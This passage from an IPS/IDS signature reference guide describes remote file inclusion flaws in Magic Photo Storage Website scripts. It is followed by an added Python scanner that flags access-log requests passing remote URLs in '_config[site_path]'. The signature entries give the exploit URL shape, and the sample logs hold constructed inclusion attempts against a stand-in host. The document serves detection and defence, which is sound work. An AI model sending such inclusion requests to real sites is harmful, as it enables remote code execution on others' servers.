TMS zl Module IPS/IDS Signature Reference Guide RLX.10.2.2.94

ProCurve TMS zl Module IPS/IDS Signature
Reference Guide Version RLX.10.2.2.94
from another remote system by http or https or ftp (INC=http://[target]/[path]/[maliciousfile]). When this malicious
file executes on the target system, the attacker can access whatever the malicious code allows.
Signature ID: 34105
Magic Photo Storage Website Multiple Remote File Inclusion vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0182 Bugtraq: 21965
Signature Description: Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute
arbitrary commands. The add_welcome_text.php, admin_email.php, add_templates.php, admin_paypal_email.php and
index.php scripts do not properly sanitize user input supplied to the '_config[site_path]' variable, so a remote
attacker can send a specially crafted URL request to them. Such a request could load a malicious file from another
remote system by http, https or ftp (admin/admin_password.php?_config[site_path]=http://[target]/[path]/[maliciousfile]).
When this malicious file executes on the target system, the attacker can access whatever the malicious code allows.
Signature ID: 34106
Magic Photo Storage Website Multiple Remote File Inclusion vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0182 Bugtraq: 21965
Signature Description: Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute
arbitrary commands. The change_catalog_template.php, add_category.php, add_news.php, couple_milestone.php and
user_email.php scripts do not properly sanitize user input supplied to the '_config[site_path]' variable, so a remote
attacker can send a specially crafted URL request to them. Such a request could load a malicious file from another
remote system by http, https or ftp (admin/admin_password.php?_config[site_path]=http://[target]/[path]/[maliciousfile]).
When this malicious file executes on the target system, the attacker can access whatever the malicious code allows.
Signature ID: 34107
Magic Photo Storage Website Multiple Remote File Inclusion vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0182 Bugtraq: 21965
Signature Description: Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute
arbitrary commands. The couple_profile.php, delete_category.php, login.php and logout.php scripts do not properly
sanitize user input supplied to the '_config[site_path]' variable, so a remote attacker can send a specially crafted
URL request to them. Such a request could load a malicious file from another remote system by http, https or ftp
(admin/admin_password.php?_config[site_path]=http://[target]/[path]/[maliciousfile]). When this malicious file
executes on the target system, the attacker can access whatever the malicious code allows.
Signature ID: 34108
Magic Photo Storage Website Multiple Remote File Inclusion vulnerability
Threat Level: Severe
Industry ID: CVE-2007-0182 Bugtraq: 21965
Signature Description: Magic Photo Storage Website contains a flaw that may allow a remote attacker to execute
arbitrary commands. The register.php, upload_photo.php, user_catelog_password.php, user_extend.php and
user/user_membership_password.php scripts do not properly sanitize user input supplied to the '_config[site_path]'
variable, so a remote attacker can send a specially crafted URL request to them. Such a request could load a
malicious file from another remote system by http, https or ftp
(admin/admin_password.php?_config[site_path]=http://[target]/[path]/[maliciousfile]). When this malicious file
executes on the target system, the attacker can access whatever the malicious code allows.
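Signatures 34105 through 34108 all describe the same request shape: a remote http, https or ftp URL supplied in '_config[site_path]'. The following is an added example, not part of this guide and not the TMS zl module's own signature logic, showing how that pattern can be searched for in web server access logs. It assumes Apache-style common log format lines; the log lines, addresses and host names are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

PARAM = "_config[site_path]"          # parameter named in the signatures above
REMOTE_SCHEMES = ("http://", "https://", "ftp://")
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_unquote(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(max_rounds):
        text = unquote(text)
    return text


def remote_include_value(request_target):
    """Return the remote URL passed in _config[site_path], or None."""
    query = urlsplit(request_target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if fully_unquote(name) != PARAM:
            continue
        value = fully_unquote(value).strip()
        if value.lower().startswith(REMOTE_SCHEMES):
            return value
    return None


def scan(log_lines):
    """Return (client, script path, remote URL) for each matching request."""
    hits = []
    for line in log_lines:
        match = REQUEST_RE.match(line)
        value = remote_include_value(match.group(2)) if match else None
        if value:
            hits.append((match.group(1), urlsplit(match.group(2)).path, value))
    return hits


# Constructed sample log lines (documentation addresses and example hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2007:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 512',
    '198.51.100.7 - - [10/Jan/2007:10:00:05 +0000] "GET /admin/admin_password.php?_config[site_path]=http://remote.example/f.txt HTTP/1.1" 200 90',
    '198.51.100.7 - - [10/Jan/2007:10:00:09 +0000] "GET /login.php?_config%5Bsite_path%5D=FTP%3A%2F%2Fremote.example%2Ff HTTP/1.0" 200 90',
    '192.0.2.44 - - [10/Jan/2007:10:01:00 +0000] "GET /register.php?_config[site_path]=/var/www/site HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The check matches on the parameter name rather than on individual script names, so it covers every script listed across the four signatures; a hit with a 200 response warrants checking the server's outbound connections at the same timestamp.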